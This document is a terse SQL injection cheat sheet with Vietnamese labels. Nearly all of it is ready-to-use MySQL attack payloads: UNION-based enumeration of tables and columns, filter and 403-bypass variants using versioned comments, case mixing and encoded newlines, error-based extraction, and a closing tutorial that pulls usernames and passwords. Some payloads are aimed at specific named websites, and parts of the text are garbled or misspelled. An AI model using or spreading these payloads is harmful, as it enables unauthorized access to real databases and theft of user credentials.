Phím tắt

/*!50000OrDeR*/ /*!50000bY*/ -- - /**/ /*!50000 */ unhex(hex(group_concat(/*!50000table_name*/))) /*!50000from*/ informartion_schema./*!50000tables*/ /*!50000where*/ /*!50000table_schema*/=/*!50000database()*/ /*!50000limit*/ 0,1 by pass 403: /*!union*/ /*!select*/ 1,2,concat_ws(0x3a,table_name),4,5,6,7 from information_schema./*!tables*/ where table_schema=database()-- - bypass all: /*!50000union*/ /*!50000select*/ 1,2,UNHEX(HEX(/*!50000CONCAT_WS*/(0x3a,/*!50000TABLE_NAME*/))),4,5,6,7 /*!50000from*/ information_schema./*!50000tables*/ /*!50000where*/ /*!50000table_schema*/=/*!50000database()*/ /*!50000limit*/ 0,1-- - /*!50000union*/ /*!50000select*/ 1,2,unhex(hex(/*!50000CONCAT_WS*/(0x3a,/*!50000column_name*/))),4,5,6,7 /*!50000from*/ information_schema./*!50000columns*/ /*!50000where*/ /*!50000table_name*/=0x... /*!50000limit*/ 0,1-- - seach version: /*!50000CONCAT_WS*/(CHAR(32,58,32),user(),database(),version()) convert(@@version using latin1) http://www.ga-k9.com/customer_testimonials.php?testimonial_id=/*!60000%2010*/ bypass union: 1) id=1+UnIoN+SeLecT 1*2*3-- - 2) id=1+UnIOn/**/SeLect 1*2*3-- - 3) id=1+UNIunionON+SELselectECT 1*2*3-- - 4) id=1+/*!UnIOn*/+/*!sElEcT*/ 1*2*3-- - 5) id=1 and (select 1)=(Select 0xAA 1000 more A’s)+UnIoN+SeLeCT 1*2*3-- - 6) id=1+%23Makemoneybmt%0aUnIOn%23Makemoneybmt%0aSeLe cT+1*2 *3-- - 7) id=1+UnIOn%0d%0aSeleCt%0d%0a1*2*3-- - 8) Id=1+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C1*2*3-- - /*!Makemoney%0d%0aunion*/+/*!Makemoney%0d%0aSelEct*/ 1*2*3-- - 9) Id=1/*!Makemoney%0d%0aunion*/+/*!Makemoney%0d%0aSelEct*/ 1*2*3-- - advance: Thay table name = char(...) or hex: 0x... vi d?: from information_schema.columns where table_name= CHAR(116, 97, 114, 95, 97, 100, 109, 105, 110)-- - http://demo.com.vn/index.php?id=-1 Union Select 1,2,CONVERT(group_concat(table_name) USING latin1),4,5,6 From Information_schema.tables-- Char(58)=0x3a database()=0x64617461626173652829 error base: /*!And (Select 1 From(Select Count(*),Concat(CHAR (124),(Select Concat(version(),0x7c,database(),0x7c,user())),floor(rAnd(0)*2),CHAR (124))x From Information_Schema.Tables Group By x)a)*/-- version 5.. ta di tìm table ch?a user /*!And (Select 1 From(Select Count(*),Concat(CHAR (124),(Select substr(group_concat(table_name),1,145) from information_schema.tables where table_schema=database()),floor(rAnd(0)*2),CHAR (124))x From Information_Schema.Tables Group By x)a)*/-- /*!And (Select 1 From(Select Count(*),Concat(CHAR (124),(Select substr(group_concat(column_name),1,145) from information_schema.columns where table_name=0x11111111111),floor(rAnd(0)*2),CHAR (124))x From Information_Schema.Tables Group By x)a)*/-- Sql Injection - Error Based (union all select) - Tutorial 1- example.com/whatever.php?id=-5 union all select 1,2,@@version,3-- 2- example.con/whatever.php?id=-5 union all select 1,2,database(),3-- 3- example.com/whatever.php?id=-5 union all select 1,2,table_name,3 from information_schema.tables-- 4- example.com/whatever.php?id=-5 union all select 1,2,column_name,3 from information_schema.columns where table_name = char(CHARCODEHERE) 5- example.com/wahtever.php?id=-5 union all select 1,2,concat(username),0x3a,(password),3 from (databasename).(tablename) --